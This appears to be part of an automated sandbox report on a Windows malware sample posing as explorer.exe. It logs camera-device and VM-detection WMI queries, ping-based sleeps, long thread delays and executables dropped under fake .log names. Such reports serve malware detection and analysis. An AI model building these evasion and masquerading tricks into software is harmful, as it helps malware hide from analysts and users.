                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = &apos;Image&apos; OR PNPClass = &apos;Camera&apos;)
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Uses ping.exe to sleep
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhost
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeMemory allocated: 1490000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeMemory allocated: 1AE60000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeMemory allocated: FC0000 memory reserve | memory write watch
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeMemory allocated: 1AA00000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 600000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 599766
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 599579
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 599422
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 599289
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 599157
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 599008
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 598823
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 598610
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 598453
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 3600000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 598012
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 597641
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 300000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 597422
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 597277
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 597000
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 596844
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 596704
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 596547
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 596384
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 596219
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 596037
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 595860
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 595655
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 595527
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 595396
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 595235
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 594922
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 594645
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 594513
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 594389
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 594281
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 594125
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593919
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593790
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593671
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593562
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593453
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593336
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593208
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 593066
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592929
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592815
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592701
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592594
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592466
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592359
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592204
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 592047
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591923
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591812
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591688
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591563
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591453
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591344
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591222
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 591094
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590979
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590874
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590750
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590579
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590468
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590358
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590215
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 590006
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589750
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589488
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589344
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589233
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 589104
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588948
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588829
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588718
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588610
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588485
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588360
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588235
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 588100
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587978
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587875
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587755
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587641
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587532
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 587307
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 586768
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 586547
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 586438
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeThread delayed: delay time: 586313
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8142Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7688Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 594Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8287Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8133
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8341
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8195
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 639
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8016
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7682
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 408
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7805
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7676
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 398
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8022
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7405
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWindow / User API: threadDelayed 6737
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeWindow / User API: threadDelayed 2769
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1091
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 660
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 870
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1008
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1228
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 989
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 974
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 949
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1442
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1327
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2738
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1191
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\UJAAAsrr.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\AxLDtRxd.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\qVqwKxgw.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\DrOTkRbS.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\DiqTAfIW.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\pxxplmMK.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\GWITZydS.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\TmvagkQx.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\SVwsOfwt.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\nTDOpObA.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\CxYvgXXc.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\ufMwPuFo.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\hovXJzGK.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\FnPmnTXV.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\wdeWzfMx.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\uNFeAYLl.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\UPlQSaAj.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\FZhLDyOY.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\bvfQbQIf.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\HzZUtpuN.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\QwEjYoPD.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\ELylTcFa.logJump to dropped file
                    Source: C:\Users\user\Desktop\CPNSQusnwC.exeDropped PE file which has not been started: C:\Users\user\Desktop\aIOpvFFY.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\ySVMqwBm.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\liYyiBRH.logJump to dropped file
                    Source: C:\Users\Default\AppData\Roaming\Microsoft\explorer.exeDropped PE file which has not been started: C:\Users\user\Desktop\bqhiOmsd.logJump to dropped file
